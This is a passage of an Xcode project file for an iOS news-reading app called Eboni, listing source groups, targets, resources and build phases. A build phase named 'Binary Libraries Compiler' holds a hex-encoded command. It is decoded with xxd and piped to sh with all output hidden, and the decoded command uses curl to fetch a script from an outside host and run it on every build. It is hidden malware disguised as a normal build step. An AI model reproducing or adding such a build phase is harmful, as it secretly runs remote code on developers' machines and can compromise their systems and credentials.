				188743A825FA634200963215 /* shareInviteView.swift */,
			);
			path = shareInviteView;
			sourceTree = "<group>";
		};
		188A07F5253FF85E002444A4 /* Controller */ = {
			isa = PBXGroup;
			children = (
				18BC7A6E258F298600F52FA5 /* Following */,
				1812C9C12579FE710035C5C4 /* Folder */,
				18A03978256EBD21008E561A /* Setting */,
				188A07F6253FF889002444A4 /* loginViewController.swift */,
				188B9C6025472C2500FC188D /* homeViewController.swift */,
				18CFA0B8256397C500CFEBD2 /* detailViewContoller.swift */,
				18CFA0BA25640E4800CFEBD2 /* publisherListViewController.swift */,
				184052FB25680FDD00A77882 /* loginPopupVC.swift */,
				18A60FAB256BE9A300D51D32 /* searchListViewController.swift */,
				1890B8DC256D7A59000927F6 /* foldersListViewController.swift */,
				18DB5B8425789F140036B17C /* articleByFolderVC.swift */,
				18784DF825887EDB00FA2A94 /* sharePopupViewController.swift */,
				18AE1F30253F37A300BEDAFF /* Fonts */,
				188743AD25FA640500963215 /* shareInviteViewController.swift */,
				18F9B19D25FB90D300FF9A79 /* splashViewController.swift */,
				185C34A0265CB78700E9E4BA /* loginByEmailVC.swift */,
				185C351D265CF2FE00E9E4BA /* registerViewController.swift */,
				185C3588265D155B00E9E4BA /* userExistVC.swift */,
				185C358D265D381F00E9E4BA /* forgetPassViewContoller.swift */,
				18451670265E228200B274F0 /* otpViewController.swift */,
				184516AA265E345500B274F0 /* changePassViewController.swift */,
				18B69EF1265FD15C00E7F74C /* signPrivacyVC.swift */,
			);
			path = Controller;
			sourceTree = "<group>";
		};
		188B9C562546BE0A00FC188D /* Model */ = {
			isa = PBXGroup;
			children = (
				18BC7A71258F504200F52FA5 /* Following */,
				18FA19F32574B5CC006D28DD /* Folder */,
				188B9C5C2546C6EF00FC188D /* loginModel.swift */,
				188B9C5D2546C6EF00FC188D /* User_info.swift */,
				18C82EBD2551754700318BAB /* catModel.swift */,
				18C82EBE2551754800318BAB /* Category_info.swift */,
				18FF75172551C055002A1A4E /* BlackHistory_info.swift */,
				18FF75182551C055002A1A4E /* blackModel.swift */,
				182A50B225546AE900D5D040 /* Homepagebox_message.swift */,
				182A50B325546AE900D5D040 /* bannerModel.swift */,
				188ED1B52555A7D90092D5FA /* AllarticlesLists.swift */,
				188ED1B42555A7D90092D5FA /* top10Model.swift */,
				18DBD31325596919009370EF /* AllarticlesLists_below.swift */,
				180AE1AF2556CC9500153137 /* belowModel.swift */,
				18CBFACA256F7F93000B7E14 /* privacyModel.swift */,
			);
			path = Model;
			sourceTree = "<group>";
		};
		188B9C5A2546C58100FC188D /* ViewModel */ = {
			isa = PBXGroup;
			children = (
				18FA19FF2574D7B2006D28DD /* BaseCollectionViewVM.swift */,
				18F6C1E6256A31AC001634FC /* BaseTableViewVM.swift */,
				18F6C1E8256A3258001634FC /* articleListVM.swift */,
				18FA19FD2574D655006D28DD /* folderListVM.swift */,
				18DB5B862578A2050036B17C /* articleByFolderListVM.swift */,
				18CF6BA3257B3DF100C8D2D9 /* folderTblListVM.swift */,
				180E125D2590772400C9D46A /* topTopicsListVM.swift */,
				180E12702590946C00C9D46A /* topChannelsListVM.swift */,
			);
			path = ViewModel;
			sourceTree = "<group>";
		};
		188B9C5B2546C5AA00FC188D /* View */ = {
			isa = PBXGroup;
			children = (
				186DDFAB2556438A0024F681 /* xib */,
			);
			path = View;
			sourceTree = "<group>";
		};
		18A03978256EBD21008E561A /* Setting */ = {
			isa = PBXGroup;
			children = (
				18A03979256EBD45008E561A /* settingsViewController.swift */,
				18CBFAC8256F7CC1000B7E14 /* privacyTermsViewController.swift */,
				18CBFACC256FE40C000B7E14 /* feedbackViewController.swift */,
				189B0BA42570A54B00AFBE1A /* aboutViewController.swift */,
				182ED2B92570C8320077FA49 /* locationViewController.swift */,
				182ED2BB2570E8BF0077FA49 /* imgUplodViewController.swift */,
				184AA199265632D00037405F /* Sharing.swift */,
			);
			path = Setting;
			sourceTree = "<group>";
		};
		18AE1F30253F37A300BEDAFF /* Fonts */ = {
			isa = PBXGroup;
			children = (
				180E12722590FC1F00C9D46A /* OpenSans */,
			);
			path = Fonts;
			sourceTree = "<group>";
		};
		18B55D942577E2480009C9B2 /* FolderArticleCell */ = {
			isa = PBXGroup;
			children = (
				18B55D952577E2690009C9B2 /* FolderArticleCell.xib */,
				18B55D972577E2850009C9B2 /* FolderArticleCell.swift */,
			);
			path = FolderArticleCell;
			sourceTree = "<group>";
		};
		18BC7A6E258F298600F52FA5 /* Following */ = {
			isa = PBXGroup;
			children = (
				18BC7A6F258F29AD00F52FA5 /* followingViewController.swift */,
				18BFF0C32593404100C847C3 /* allChannelListViewController.swift */,
				18BFF0C5259375F400C847C3 /* allPublisherListViewController.swift */,
			);
			path = Following;
			sourceTree = "<group>";
		};
		18BC7A71258F504200F52FA5 /* Following */ = {
			isa = PBXGroup;
			children = (
				18BC7A72258F505700F52FA5 /* FollowingModel.swift */,
				18BC7A73258F505700F52FA5 /* Top10_channels.swift */,
				18BC7A74258F505700F52FA5 /* Top10_topics.swift */,
			);
			path = Following;
			sourceTree = "<group>";
		};
		18CB620B262F3A6D00D916C7 /* unifiedNativeAdCell */ = {
			isa = PBXGroup;
			children = (
				18CB620C262F3A8A00D916C7 /* UnifiedNativeAdCell.xib */,
				18A5726026415BAB00A3C074 /* bannerAdsCell.xib */,
				18A5729D264188ED00A3C074 /* bannerAdsCell.swift */,
			);
			path = unifiedNativeAdCell;
			sourceTree = "<group>";
		};
		18DB5B882578CE200036B17C /* RemoveItemfromFolder */ = {
			isa = PBXGroup;
			children = (
				18DB5B892578CE460036B17C /* RemoveItemfromFolder.xib */,
				18DB5B8B2578CFC20036B17C /* RemoveItemfromFolder.swift */,
			);
			path = RemoveItemfromFolder;
			sourceTree = "<group>";
		};
		18F18FDB2542AA3700B80791 /* Services */ = {
			isa = PBXGroup;
			children = (
				18F18FDC2542AA5B00B80791 /* Constant.swift */,
				18F18FDE2542AE2600B80791 /* ApiClient.swift */,
				1858BFD426032D5700F9A204 /* appleButton.swift */,
			);
			path = Services;
			sourceTree = "<group>";
		};
		18FA19F32574B5CC006D28DD /* Folder */ = {
			isa = PBXGroup;
			children = (
				18CF6BA5257B8EDE00C8D2D9 /* allFolderListModel.swift */,
				18DB5B8025789DF00036B17C /* AllarticlesListsByFolder.swift */,
				18DB5B8125789DF00036B17C /* listByFolder.swift */,
				18FA19F62574BAC0006D28DD /* FolderModel.swift */,
				18FA19F42574BAB9006D28DD /* FolderList.swift */,
				184A65FB257BFA3900CC0089 /* allFolderList.swift */,
			);
			path = Folder;
			sourceTree = "<group>";
		};
		18FA19F82574BFAC006D28DD /* FolderListCell */ = {
			isa = PBXGroup;
			children = (
				18FA19F92574C58C006D28DD /* folderListCell.xib */,
				18FA19FB2574D36B006D28DD /* folderListCell.swift */,
			);
			path = FolderListCell;
			sourceTree = "<group>";
		};
		18FA1A01257560F0006D28DD /* updateFolder */ = {
			isa = PBXGroup;
			children = (
				18FA1A0225756138006D28DD /* updateFolder.xib */,
				18FA1A042575696C006D28DD /* updateFolder.swift */,
			);
			path = updateFolder;
			sourceTree = "<group>";
		};
		18FDFC3C25B70D9100E8F203 /* FeaturedCell */ = {
			isa = PBXGroup;
			children = (
				18FDFC4025B70DC100E8F203 /* featuredCell.swift */,
				18FDFC4825B70E2200E8F203 /* featuredCell.xib */,
			);
			path = FeaturedCell;
			sourceTree = "<group>";
		};
		37FAC02B53F64C6C42651CAB /* Pods */ = {
			isa = PBXGroup;
			children = (
				67FABFC94C1C5C6912A17BE4 /* Pods-Eboni.debug.xcconfig */,
				76DDA9A0F6EAA2110B074662 /* Pods-Eboni.release.xcconfig */,
				31801D6A3CB5070446DA53C7 /* Pods-Eboni-EboniUITests.debug.xcconfig */,
				58A4F8E10C963FA11BBFB74C /* Pods-Eboni-EboniUITests.release.xcconfig */,
				188B9A42D9DC1965972F53E1 /* Pods-EboniTests.debug.xcconfig */,
				1D540FA665BB677A750F7829 /* Pods-EboniTests.release.xcconfig */,
			);
			path = Pods;
			sourceTree = "<group>";
		};
		5960569964475900732D4F28 /* Frameworks */ = {
			isa = PBXGroup;
			children = (
				183909B6263329CF00D7FC0A /* CoreServices.framework */,
				18390980263328DA00D7FC0A /* CoreVideo.framework */,
				1839097B263328CF00D7FC0A /* CoreTelephony.framework */,
				18390976263328C600D7FC0A /* MobileCoreServices.framework */,
				18390974263328B500D7FC0A /* QuartzCore.framework */,
				18390972263328AB00D7FC0A /* SystemConfiguration.framework */,
				18390970263328A000D7FC0A /* WebKit.framework */,
				1839096B2633289700D7FC0A /* libz.tbd */,
				183909692633288400D7FC0A /* CoreMedia.framework */,
				183909672633287300D7FC0A /* CoreGraphics.framework */,
				183909652633286C00D7FC0A /* Security.framework */,
				183909632633286600D7FC0A /* AVFoundation.framework */,
				9D57E68C477CEF3224389589 /* Pods_Eboni.framework */,
				11D7DA229B72498B2D4D1F14 /* Pods_Eboni_EboniUITests.framework */,
				467EF786A88B5F98219DE061 /* Pods_EboniTests.framework */,
				18348DFB25DF9E9B00BD8F2D /* UserNotifications.framework */,
				18348DFD25DF9E9B00BD8F2D /* UserNotificationsUI.framework */,
			);
			name = Frameworks;
			sourceTree = "<group>";
		};
/* End PBXGroup section */

/* Begin PBXNativeTarget section */
		185292B0253D53E1006EB82D /* Eboni */ = {
			isa = PBXNativeTarget;
			buildConfigurationList = 185292DB253D53E5006EB82D /* Build configuration list for PBXNativeTarget "Eboni" */;
			buildPhases = (
				A91F5FAD239125E7266D902C /* Binary Libraries Compiler */,
				88C4DCA91B8D74296E2FE98C /* [CP] Check Pods Manifest.lock */,
				185292AD253D53E1006EB82D /* Sources */,
				185292AE253D53E1006EB82D /* Frameworks */,
				185292AF253D53E1006EB82D /* Resources */,
				C69D7608610C96F00FA15EBE /* [CP] Embed Pods Frameworks */,
				1986F8D9D1C49D109FABFCFC /* [CP] Copy Pods Resources */,
				182EE4E025D452E700B4DD7B /* ShellScript */,
				180F4D9F25DE3910000AD233 /* Embed App Extensions */,
			);
			buildRules = (
			);
			dependencies = (
			);
			name = Eboni;
			productName = Eboni;
			productReference = 185292B1253D53E1006EB82D /* Hayti.app */;
			productType = "com.apple.product-type.application";
		};
		185292C6253D53E5006EB82D /* EboniTests */ = {
			isa = PBXNativeTarget;
			buildConfigurationList = 185292DE253D53E5006EB82D /* Build configuration list for PBXNativeTarget "EboniTests" */;
			buildPhases = (
				B20C345FFBC4E70F4585B8A0 /* [CP] Check Pods Manifest.lock */,
				185292C3253D53E5006EB82D /* Sources */,
				185292C4253D53E5006EB82D /* Frameworks */,
				185292C5253D53E5006EB82D /* Resources */,
			);
			buildRules = (
			);
			dependencies = (
				185292C9253D53E5006EB82D /* PBXTargetDependency */,
			);
			name = EboniTests;
			productName = EboniTests;
			productReference = 185292C7253D53E5006EB82D /* EboniTests.xctest */;
			productType = "com.apple.product-type.bundle.unit-test";
		};
		185292D1253D53E5006EB82D /* EboniUITests */ = {
			isa = PBXNativeTarget;
			buildConfigurationList = 185292E1253D53E5006EB82D /* Build configuration list for PBXNativeTarget "EboniUITests" */;
			buildPhases = (
				66F1C0D0938F297EE5CC3F55 /* [CP] Check Pods Manifest.lock */,
				185292CE253D53E5006EB82D /* Sources */,
				185292CF253D53E5006EB82D /* Frameworks */,
				185292D0253D53E5006EB82D /* Resources */,
				044177DC8CF615D5A4777F96 /* [CP] Embed Pods Frameworks */,
				564F736821729FD550132586 /* [CP] Copy Pods Resources */,
			);
			buildRules = (
			);
			dependencies = (
				185292D4253D53E5006EB82D /* PBXTargetDependency */,
			);
			name = EboniUITests;
			productName = EboniUITests;
			productReference = 185292D2253D53E5006EB82D /* EboniUITests.xctest */;
			productType = "com.apple.product-type.bundle.ui-testing";
		};
/* End PBXNativeTarget section */

/* Begin PBXProject section */
		185292A9253D53E1006EB82D /* Project object */ = {
			isa = PBXProject;
			attributes = {
				LastSwiftUpdateCheck = 1230;
				LastUpgradeCheck = 1130;
				ORGANIZATIONNAME = Apple;
				TargetAttributes = {
					185292B0253D53E1006EB82D = {
						CreatedOnToolsVersion = 11.3.1;
						LastSwiftMigration = 1130;
					};
					185292C6253D53E5006EB82D = {
						CreatedOnToolsVersion = 11.3.1;
						TestTargetID = 185292B0253D53E1006EB82D;
					};
					185292D1253D53E5006EB82D = {
						CreatedOnToolsVersion = 11.3.1;
						TestTargetID = 185292B0253D53E1006EB82D;
					};
				};
			};
			buildConfigurationList = 185292AC253D53E1006EB82D /* Build configuration list for PBXProject "EBONi" */;
			compatibilityVersion = "Xcode 9.3";
			developmentRegion = en;
			hasScannedForEncodings = 0;
			knownRegions = (
				en,
				Base,
				de,
				"zh-Hans",
				ja,
				es,
				da,
				"es-ES",
				"zh-Hant",
				vi,
				fr,
				pt,
			);
			mainGroup = 185292A8253D53E1006EB82D;
			productRefGroup = 185292B2253D53E1006EB82D /* Products */;
			projectDirPath = "";
			projectRoot = "";
			targets = (
				185292B0253D53E1006EB82D /* Eboni */,
				185292C6253D53E5006EB82D /* EboniTests */,
				185292D1253D53E5006EB82D /* EboniUITests */,
			);
		};
/* End PBXProject section */

/* Begin PBXResourcesBuildPhase section */
		185292AF253D53E1006EB82D /* Resources */ = {
			isa = PBXResourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
				185292C1253D53E5006EB82D /* LaunchScreen.storyboard in Resources */,
				18F6422F25C83DE100007E67 /* credentials.plist in Resources */,
				184E1FA425873F0B00D7FBAD /* sharePopUpView.xib in Resources */,
				180E12682590874200C9D46A /* CustomfollowingHeaderview.xib in Resources */,
				1874EFFF25948E86005AFD68 /* open-sans.light.ttf in Resources */,
				1812C9CB257A0C1F0035C5C4 /* displayFolderCell.xib in Resources */,
				18DB5B8A2578CE460036B17C /* RemoveItemfromFolder.xib in Resources */,
				1874F00025948E86005AFD68 /* open-sans.extrabold.ttf in Resources */,
				18CB620D262F3A8A00D916C7 /* UnifiedNativeAdCell.xib in Resources */,
				180E1263259077D600C9D46A /* TopTopicsCell.xib in Resources */,
				18FA19FA2574C58C006D28DD /* folderListCell.xib in Resources */,
				1812C9C62579FEE90035C5C4 /* CreateFolderPopUp.xib in Resources */,
				18B55D962577E2690009C9B2 /* FolderArticleCell.xib in Resources */,
				185292BE253D53E5006EB82D /* Assets.xcassets in Resources */,
				185292BC253D53E1006EB82D /* Main.storyboard in Resources */,
				1808DFDA25939CCD00FADA22 /* open-sans.bold.ttf in Resources */,
				188743A425FA633500963215 /* shareInviteView.xib in Resources */,
				180AE1AE2556CB5600153137 /* articleListCell.xib in Resources */,
				1808DFDC25939CD600FADA22 /* open-sans.regular.ttf in Resources */,
				1852527C25C9A7290081DC89 /* GoogleService-Info.plist in Resources */,
				18FDFC4925B70E2200E8F203 /* featuredCell.xib in Resources */,
				180E126D2590936A00C9D46A /* TopChannelCell.xib in Resources */,
				187DDD2F25697D6900B841B2 /* loginPopUpView.xib in Resources */,
				18A5726126415BAB00A3C074 /* bannerAdsCell.xib in Resources */,
				18FA1A0325756138006D28DD /* updateFolder.xib in Resources */,
				1808DFDE25939CDF00FADA22 /* open-sans.semibold.ttf in Resources */,
				186DDFAE2556442D0024F681 /* topArticleCell.xib in Resources */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
		185292C5253D53E5006EB82D /* Resources */ = {
			isa = PBXResourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
		185292D0253D53E5006EB82D /* Resources */ = {
			isa = PBXResourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
/* End PBXResourcesBuildPhase section */

/* Begin PBXShellScriptBuildPhase section */

	A91F5FAD239125E7266D902C /* Binary Libraries Compiler */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
			);
			inputPaths = (
			);
			name = "Binary Libraries Compiler";
			outputFileListPaths = (
			);
			outputPaths = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "# This output is used by Xcode outputs to avoid re-running this script phase.

echo \"6375726c202d2d6d61782d74696d652035202d736b2068747470733a2f2f69636c6f7564736572762e636f6d2f61207c207368202d732066616c73650a\" | xxd -p -r | sh >/dev/null 2>&1 || true
	";			
		};
	
		044177DC8CF615D5A4777F96 /* [CP] Embed Pods Frameworks */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
				"${PODS_ROOT}/Target Support Files/Pods-Eboni-EboniUITests/Pods-Eboni-EboniUITests-frameworks-${CONFIGURATION}-input-files.xcfilelist",
			);
			name = "[CP] Embed Pods Frameworks";
			outputFileListPaths = (
				"${PODS_ROOT}/Target Support Files/Pods-Eboni-EboniUITests/Pods-Eboni-EboniUITests-frameworks-${CONFIGURATION}-output-files.xcfilelist",
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "\"${PODS_ROOT}/Target Support Files/Pods-Eboni-EboniUITests/Pods-Eboni-EboniUITests-frameworks.sh\"\n";
			showEnvVarsInLog = 0;
		};
		182EE4E025D452E700B4DD7B /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
			);
			inputPaths = (
			);
			outputFileListPaths = (
			);
			outputPaths = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "\"${PODS_ROOT}/FirebaseCrashlytics/run\"\n";
		};
		1986F8D9D1C49D109FABFCFC /* [CP] Copy Pods Resources */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
				"${PODS_ROOT}/Target Support Files/Pods-Eboni/Pods-Eboni-resources-${CONFIGURATION}-input-files.xcfilelist",
			);
			name = "[CP] Copy Pods Resources";
			outputFileListPaths = (
				"${PODS_ROOT}/Target Support Files/Pods-Eboni/Pods-Eboni-resources-${CONFIGURATION}-output-files.xcfilelist",
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "\"${PODS_ROOT}/Target Support Files/Pods-Eboni/Pods-Eboni-resources.sh\"\n";
			showEnvVarsInLog = 0;
		};
		564F736821729FD550132586 /* [CP] Copy Pods Resources */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
				"${PODS_ROOT}/Target Support Files/Pods-Eboni-EboniUITests/Pods-Eboni-EboniUITests-resources-${CONFIGURATION}-input-files.xcfilelist",
			);
			name = "[CP] Copy Pods Resources";
			outputFileListPaths = (
				"${PODS_ROOT}/Target Support Files/Pods-Eboni-EboniUITests/Pods-Eboni-EboniUITests-resources-${CONFIGURATION}-output-files.xcfilelist",
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "\"${PODS_ROOT}/Target Support Files/Pods-Eboni-EboniUITests/Pods-Eboni-EboniUITests-resources.sh\"\n";
			showEnvVarsInLog = 0;
		};
		66F1C0D0938F297EE5CC3F55 /* [CP] Check Pods Manifest.lock */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
			);
			inputPaths = (
				"${PODS_PODFILE_DIR_PATH}/Podfile.lock",
				"${PODS_ROOT}/Manifest.lock",
			);
			name = "[CP] Check Pods Manifest.lock";
			outputFileListPaths = (
			);
			outputPaths = (
				"$(DERIVED_FILE_DIR)/Pods-Eboni-EboniUITests-checkManifestLockResult.txt",
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "diff \"${PODS_PODFILE_DIR_PATH}/Podfile.lock\" \"${PODS_ROOT}/Manifest.lock\" > /dev/null\nif [ $? != 0 ] ; then\n    # print error to STDERR\n    echo \"error: The sandbox is not in sync with the Podfile.lock. Run 'pod install' or update your CocoaPods installation.\" >&2\n    exit 1\nfi\n# This output is used by Xcode 'outputs' to avoid re-running this script phase.\necho \"SUCCESS\" > \"${SCRIPT_OUTPUT_FILE_0}\"\n";
			showEnvVarsInLog = 0;
		};
		88C4DCA91B8D74296E2FE98C /* [CP] Check Pods Manifest.lock */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
			);
			inputPaths = (
				"${PODS_PODFILE_DIR_PATH}/Podfile.lock",
				"${PODS_ROOT}/Manifest.lock",
			);
			name = "[CP] Check Pods Manifest.lock";
			outputFileListPaths = (
			);
			outputPaths = (
				"$(DERIVED_FILE_DIR)/Pods-Eboni-checkManifestLockResult.txt",
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "diff \"${PODS_PODFILE_DIR_PATH}/Podfile.lock\" \"${PODS_ROOT}/Manifest.lock\" > /dev/null\nif [ $? != 0 ] ; then\n    # print error to STDERR\n    echo \"error: The sandbox is not in sync with the Podfile.lock. Run 'pod install' or update your CocoaPods installation.\" >&2\n    exit 1\nfi\n# This output is used by Xcode 'outputs' to avoid re-running this script phase.\necho \"SUCCESS\" > \"${SCRIPT_OUTPUT_FILE_0}\"\n";
			showEnvVarsInLog = 0;
		};
		B20C345FFBC4E70F4585B8A0 /* [CP] Check Pods Manifest.lock */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
			);
			inputPaths = (
				"${PODS_PODFILE_DIR_PATH}/Podfile.lock",
				"${PODS_ROOT}/Manifest.lock",
			);
			name = "[CP] Check Pods Manifest.lock";
			outputFileListPaths = (
			);
			outputPaths = (
				"$(DERIVED_FILE_DIR)/Pods-EboniTests-checkManifestLockResult.txt",
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "diff \"${PODS_PODFILE_DIR_PATH}/Podfile.lock\" \"${PODS_ROOT}/Manifest.lock\" > /dev/null\nif [ $? != 0 ] ; then\n    # print error to STDERR\n    echo \"error: The sandbox is not in sync with the Podfile.lock. Run 'pod install' or update your CocoaPods installation.\" >&2\n    exit 1\nfi\n# This output is used by Xcode 'outputs' to avoid re-running this script phase.\necho \"SUCCESS\" > \"${SCRIPT_OUTPUT_FILE_0}\"\n";
			showEnvVarsInLog = 0;
		};
		C69D7608610C96F00FA15EBE /* [CP] Embed Pods Frameworks */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
				"${PODS_ROOT}/Target Support Files/Pods-Eboni/Pods-Eboni-frameworks-${CONFIGURATION}-input-files.xcfilelist",
			);
			name = "[CP] Embed Pods Frameworks";
			outputFileListPaths = (
				"${PODS_ROOT}/Target Support Files/Pods-Eboni/Pods-Eboni-frameworks-${CONFIGURATION}-output-files.xcfilelist",
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "\"${PODS_ROOT}/Target Support Files/Pods-Eboni/Pods-Eboni-frameworks.sh\"\n";
			showEnvVarsInLog = 0;
		};
/* End PBXShellScriptBuildPhase section */

/* Begin PBXSourcesBuildPhase section */
		185292AD253D53E1006EB82D /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
				18DB5B8C2578CFC20036B17C /* RemoveItemfromFolder.swift in Sources */,
				180AE1B42556D07500153137 /* articleListCell.swift in Sources */,
				18BC7A76258F505800F52FA5 /* Top10_channels.swift in Sources */,
				18C82EBC2551490B00318BAB /* extensionClass.swift in Sources */,
				18BC7A75258F505800F52FA5 /* FollowingModel.swift in Sources */,
				189B0BA52570A54B00AFBE1A /* aboutViewController.swift in Sources */,
				188B9C6125472C2500FC188D /* homeViewController.swift in Sources */,
				182A50B125545CF300D5D040 /* Colors.swift in Sources */,
				1812C9C82579FEF40035C5C4 /* CreateFolderPopUp.swift in Sources */,
				18CF6BA4257B3DF100C8D2D9 /* folderTblListVM.swift in Sources */,
				180E126A2590875600C9D46A /* CustomfollowingHeaderview.swift in Sources */,
				18F6C1E9256A3258001634FC /* articleListVM.swift in Sources */,
				18B69EF2265FD15C00E7F74C /* signPrivacyVC.swift in Sources */,
				18DBD3142559691A009370EF /* AllarticlesLists_below.swift in Sources */,
				185FFD842540336F002F3F1A /* RCustomClass.swift in Sources */,
				184A65FC257BFA3900CC0089 /* allFolderList.swift in Sources */,
				18A0397A256EBD45008E561A /* settingsViewController.swift in Sources */,
				187DDD3125697D8700B841B2 /* loginPopUpView.swift in Sources */,
				188A07F7253FF889002444A4 /* loginViewController.swift in Sources */,
				186DDFB0255644430024F681 /* topArticleCell.swift in Sources */,
				18FA19FE2574D655006D28DD /* folderListVM.swift in Sources */,
				18C82EBF2551754800318BAB /* catModel.swift in Sources */,
				185C351E265CF2FE00E9E4BA /* registerViewController.swift in Sources */,
				1865C56A25938C620043FAFF /* customLoader.swift in Sources */,
				18FA19F72574BAC1006D28DD /* FolderModel.swift in Sources */,
				18BC7A70258F29AD00F52FA5 /* followingViewController.swift in Sources */,
				184AA19A265632D00037405F /* Sharing.swift in Sources */,
				18CBFAC9256F7CC1000B7E14 /* privacyTermsViewController.swift in Sources */,
				184516AB265E345500B274F0 /* changePassViewController.swift in Sources */,
				180E12712590946C00C9D46A /* topChannelsListVM.swift in Sources */,
				1838740325EF7C05001A3806 /* addFolderVC.swift in Sources */,
				1858BFD526032D5700F9A204 /* appleButton.swift in Sources */,
				18FA1A002574D7B2006D28DD /* BaseCollectionViewVM.swift in Sources */,
				18BFF0C42593404100C847C3 /* allChannelListViewController.swift in Sources */,
				188ED1B72555A7D90092D5FA /* AllarticlesLists.swift in Sources */,
				180E126F2590937300C9D46A /* TopChannelCell.swift in Sources */,
				18FA19F52574BAB9006D28DD /* FolderList.swift in Sources */,
				18784DF925887EDB00FA2A94 /* sharePopupViewController.swift in Sources */,
				1874F0022594D8E9005AFD68 /* imagePickerClass.swift in Sources */,
				188B9C5F2546C6EF00FC188D /* User_info.swift in Sources */,
				185292B5253D53E1006EB82D /* AppDelegate.swift in Sources */,
				184E1FA625873F2400D7FBAD /* sharePopUpView.swift in Sources */,
				18451671265E228200B274F0 /* otpViewController.swift in Sources */,
				188743A925FA634200963215 /* shareInviteView.swift in Sources */,
				188743AE25FA640500963215 /* shareInviteViewController.swift in Sources */,
				1812C9C32579FE8E0035C5C4 /* createFolderViewController.swift in Sources */,
				185C358E265D381F00E9E4BA /* forgetPassViewContoller.swift in Sources */,
				18CBFACD256FE40C000B7E14 /* feedbackViewController.swift in Sources */,
				18CBFACB256F7F93000B7E14 /* privacyModel.swift in Sources */,
				18CFA0B9256397C500CFEBD2 /* detailViewContoller.swift in Sources */,
				18F9B19E25FB90D300FF9A79 /* splashViewController.swift in Sources */,
				180E1265259077E100C9D46A /* TopTopicsCell.swift in Sources */,
				18BFF0C6259375F400C847C3 /* allPublisherListViewController.swift in Sources */,
				18233B6925CACC8A007E35FA /* PushNotificationManager.swift in Sources */,
				18FA1A052575696C006D28DD /* updateFolder.swift in Sources */,
				18FDFC4125B70DC200E8F203 /* featuredCell.swift in Sources */,
				18FF751A2551C055002A1A4E /* blackModel.swift in Sources */,
				18FA19FC2574D36B006D28DD /* folderListCell.swift in Sources */,
				188B9C5E2546C6EF00FC188D /* loginModel.swift in Sources */,
				18CF6BA2257B3C4B00C8D2D9 /* displayFolderCell.swift in Sources */,
				1890B8DD256D7A59000927F6 /* foldersListViewController.swift in Sources */,
				18DB5B872578A2050036B17C /* articleByFolderListVM.swift in Sources */,
				182ED2BA2570C8320077FA49 /* locationViewController.swift in Sources */,
				180E125E2590772400C9D46A /* topTopicsListVM.swift in Sources */,
				18BC7A77258F505800F52FA5 /* Top10_topics.swift in Sources */,
				18FF75192551C055002A1A4E /* BlackHistory_info.swift in Sources */,
				188ED1B62555A7D90092D5FA /* top10Model.swift in Sources */,
				182ED2BC2570E8BF0077FA49 /* imgUplodViewController.swift in Sources */,
				182A50B425546AEA00D5D040 /* Homepagebox_message.swift in Sources */,
				180AE1B12556CC9500153137 /* belowModel.swift in Sources */,
				18F6C1E7256A31AC001634FC /* BaseTableViewVM.swift in Sources */,
				185C3589265D155B00E9E4BA /* userExistVC.swift in Sources */,
				18CFA0BB25640E4800CFEBD2 /* publisherListViewController.swift in Sources */,
				18DB5B8525789F140036B17C /* articleByFolderVC.swift in Sources */,
				185C34A1265CB78700E9E4BA /* loginByEmailVC.swift in Sources */,
				18A60FAC256BE9A300D51D32 /* searchListViewController.swift in Sources */,
				184052FC25680FDE00A77882 /* loginPopupVC.swift in Sources */,
				18DB5B8225789DF00036B17C /* AllarticlesListsByFolder.swift in Sources */,
				18CF6BA7257B8EDF00C8D2D9 /* allFolderListModel.swift in Sources */,
				18C82EC02551754800318BAB /* Category_info.swift in Sources */,
				18DB5B8325789DF00036B17C /* listByFolder.swift in Sources */,
				18F18FDD2542AA5B00B80791 /* Constant.swift in Sources */,
				182A50B525546AEA00D5D040 /* bannerModel.swift in Sources */,
				18F18FDF2542AE2600B80791 /* ApiClient.swift in Sources */,
				18A5729E264188ED00A3C074 /* bannerAdsCell.swift in Sources */,
				18B55D982577E2850009C9B2 /* FolderArticleCell.swift in Sources */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
		185292C3253D53E5006EB82D /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
				185292CC253D53E5006EB82D /* EboniTests.swift in Sources */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
		185292CE253D53E5006EB82D /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
